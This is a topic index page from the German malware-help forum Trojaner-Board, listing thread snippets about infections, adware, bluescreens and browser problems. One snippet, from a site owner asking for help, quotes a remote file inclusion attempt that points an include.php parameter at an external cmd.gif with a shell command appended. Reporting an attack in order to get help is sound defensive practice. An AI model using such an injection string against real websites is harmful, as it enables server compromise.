Zurück   Trojaner-Board > Themen

Alles zum Thema: Plagen

  Letzter Beitrag Antworten Hits Forum
Reinigung meines Computers wegen Fehlern die entstehen
Plagen - Hallo, ich habe zwar keine Trojaner oder so, jedoch macht mein Browser und mein USB Port manchmal Probleme obwohl es bei Bekannten einwandfrei funktioniert, ich möchte nur eine intensive Reinigung durchführen mithilfe eines Mitglieds. Ich selbst war schon mal hier wegen einem Trojaner und mir wurde...
Plagegeister aller Art und deren Bekämpfung
Immer öfter Bluescreen Win7
Plagen - Hallo zusammen, Seit einigen Wochen plagen mich immer wieder Bluescreens. Ich habe seit dem Kauf des PC's nichts an der Hardware verändert. Ich habe mal die Bluescreen logs mit dem Viewer gespeichert. Ich hoffe jemand kann mir weiter helfen. chkdsk hat keine Probleme gefunden. sfc/scannow...
Alles rund um Windows
Regelmäßige Bluescreens und der Verdacht durch Rougekiller auf einen IRP Hook Rootkit
Plagen - Guten Tag zusammen, nun seit einiger Zeit plagen mich unerwüschte Bluescreens woraufhin mein System ohne ersichtlcihen Grund abstürtzt. Hatte auch einiges auf eigener Faust probiertm leider vergebens. Beispielsweise durch Spyhunter, Rougekiller, antilogger oder meinem AVG Antivirus. Eine...
Log-Analyse und Auswertung
Avast URL:Mal-Warnung Firefox
Plagen - Huhu zusammen, ich bin vor Tagen vom 'Opera 12.16' auf die aktuellste Firefox-Version umgesteigen, seitdem plagen mich andauernd 'URL:Mal'-Warnungen seitens 'Avast Free', davor hatte ich eigentlich keine Probleme solcher Art - dabei ist es egal, welche Seiten ich ansurfe, das geschieht ganz...
Plagegeister aller Art und deren Bekämpfung
babylon, tarma, snapdo, iminent, lyricscontainer alles auf einmal; habe mehrere tools ausgeführt; bitte logfiles auswerten
Plagen - habe gestern im zusammenhang mit einem falschen java-update die oben genannten Plagen eingefangen. einiges konnte ich gleich bei den Programmen in der Systemsteuerung deinstallieren (fraglich natürlich, ob dies tatsächlich geklappt hat) heute habe ich mich auf eurer comunity etwas schlau...
Log-Analyse und Auswertung
Bluescreen USB Treiber
Plagen - Guten Tag/Abend/Morgen/Nacht ich bins schon wieder :party: Nachdem es einige Wochen ging plagen mich die Bluescreens schonwieder ... Habe alle Updates installiert, Treiber sind auch drauf.. Habe Windows 7 Professional 64-Bit
Alles rund um Windows
00000004.@ (Trojan.0Access) usw.
Plagen - Liebes Forum, mich plagen immer wieder die selben Meldungen von Avira: C:\$Recycle.Bin\S-1-5-18\$4c9a3b5a948dc1042a44f2036207415d\U\00000004.@ (Trojan.0Access) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\$Recycle.Bin\S-1-5-18\$4c9a3b5a948dc1042a44f2036207415d\U\00000008.@...
Plagegeister aller Art und deren Bekämpfung
Seth Avazutracking.net und ad.yieldmanager.com entfernen?
Plagen - Hi zusammen, wie ihr seht bin ich neu hier und mich plagen gleich 2 nervige Werbepopup-Viren. Von Zeit zu Zeit öffnet sich in Firefox immer wieder ein neuer Tab, entweder mit avazu.tracking oder yieldmanager und leitet mich an irgendeine Werbung weiter. Dies ist mehr als nervig und ich möchte...
Plagegeister aller Art und deren Bekämpfung
Rechner friert nach dem Zwangi entfernen regelmesig ein
Plagen - Hallo wie oben beschrieben habe ich das problem das nach dem installieren des Idownloaders Zwangi und andere viren mich plagen und mein rechner nemmer so läuft wie ichs will :heulen:
Plagegeister aller Art und deren Bekämpfung
TR/Dldr.FakeAV.A6 & TR/Dldr.Zlob.QZ2 befallen meinen PC !HILFE!
Plagen - Ich hab gleich 2 von diesen Plagen auf meinem Pc und hab keine Ahnung wie ich die wieder los werde....:heulen: Kann mir bitte jemand helfen und mir Anweisungen geben wie ich am besten dagegen vorgehe? BITTE LG Angie
Plagegeister aller Art und deren Bekämpfung
Lags/Aussetzer beim Surfen unter Windows XP SP2
Plagen - Guten Tag allerseits! Mich plagen schon seit einiger Zeit öfters vorkommende Lags beim Surfen! Diese halten ungefähr 10 sek an. Gehäuftes Vorkommen dieses Erscheinens erfahre ich,wenn ich Youtube u. ä. Seiten verwende. Ich verwende Windows XP SP2 auf welchem das Vista Customization Pack v3 läuft....
Plagegeister aller Art und deren Bekämpfung
Aussetzer/Lags beim Surfen. Bitte um Hilfe!
Plagen - Guten Tag allerseits! Mich plagen schon seit einiger Zeit öfters vorkommende Lags beim Surfen! Diese halten ungefähr 10 sek an. Gehäuftes Vorkommen dieses Erscheinens erfahre ich,wenn ich Youtube u. ä. Seiten verwende. Kann es sich möglicherweise um einen Virus handeln? Wenn ja,was soll/kann ich...
Mülltonne
Hab mal ein Frage wegen Trojana gif bzw. hackversuch
Plagen - Also bei mir auf der Webseite hat heute einer öfters versucht eine fremde Domain zu includen. Das Was er versucht hat sieht so aus h**p://meineDomain.de/include.php?file= und hat das dann angehängt h**p://br.geocities.lasichweg/cmdsharkhackers/cmd.gif?&cmd=ls hab mir dann mal die Seite angeschaut...
Plagegeister aller Art und deren Bekämpfung
spyware.look2me
Plagen - Guten Tag, mich plagen ständig irgendwelche Popups! Meine software ewido sagt mir immer beim hochfahren, dass ich spyware.look2me drauf hab und säubert es auch immer, es kommt aber immer nach einem neustart wieder...bitte um Hilfe Danke für eure Antworten Logfile of HijackThis v1.99.1
Plagegeister aller Art und deren Bekämpfung
Was tue ich nun???
Plagen - Hallo ich hab folgendes Problem, da ich mehrere Pc`s in betrieb habe wollte ich mal das NETBus, oder das Tool BackOriffice Ausprobieren, mir gehts vor allem um dasremote mitbearbeiten item. Diese tools sind zwar vorhanden aber ich habe es bis jetzt nicht geschaft diese ohne Trojaner, oder...
Plagegeister aller Art und deren Bekämpfung
Resistente Plagen?
Plagen - Habe durch eure Hilfe hier mindesten 4 Würmer bei einer Bekannten vom Rechner geprügelt. Herzlichen Dank dafür, dass ihr eure Zeit dafür opfert vielen anderen zu helfen. Allerdings befürchte ich einen Kompromittierungsgrad, der die Neueinspielung des Systems notwendig macht. Es steht lediglich...
Plagegeister aller Art und deren Bekämpfung
creative radeon 9600 flimmert
Plagen - Hi, ich habe vor 2 Tagen meine alte geforce 2 mx gegen eine radeon 9600 ausgetauscht.Nun plagen mich zweifel. Als Treiber verwende ich den neuesten catalyst.Auf XP läuft sie mit 1024*768 und angezeigten 100 Hz.Nur kann ich das mit den 100 Hz leider nicht glauben. Ich habe das Gefühl das System...
Netzwerk und Hardware
Trojaner, Wurm oder nicht?
Plagen - Hallo erstmal, seit einiger zeit plagen mich immer wieder automatische Neustartmeldungen nach hochfahren des Betriebsystemes (WinXP). Remoteprozeduraufruh unerwartet beendet. Ihr kennt das sicher von Würmern usw. Das Komische ist aber, dass ich diese Meldung nur vll. alle 10mal starten bekomme...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.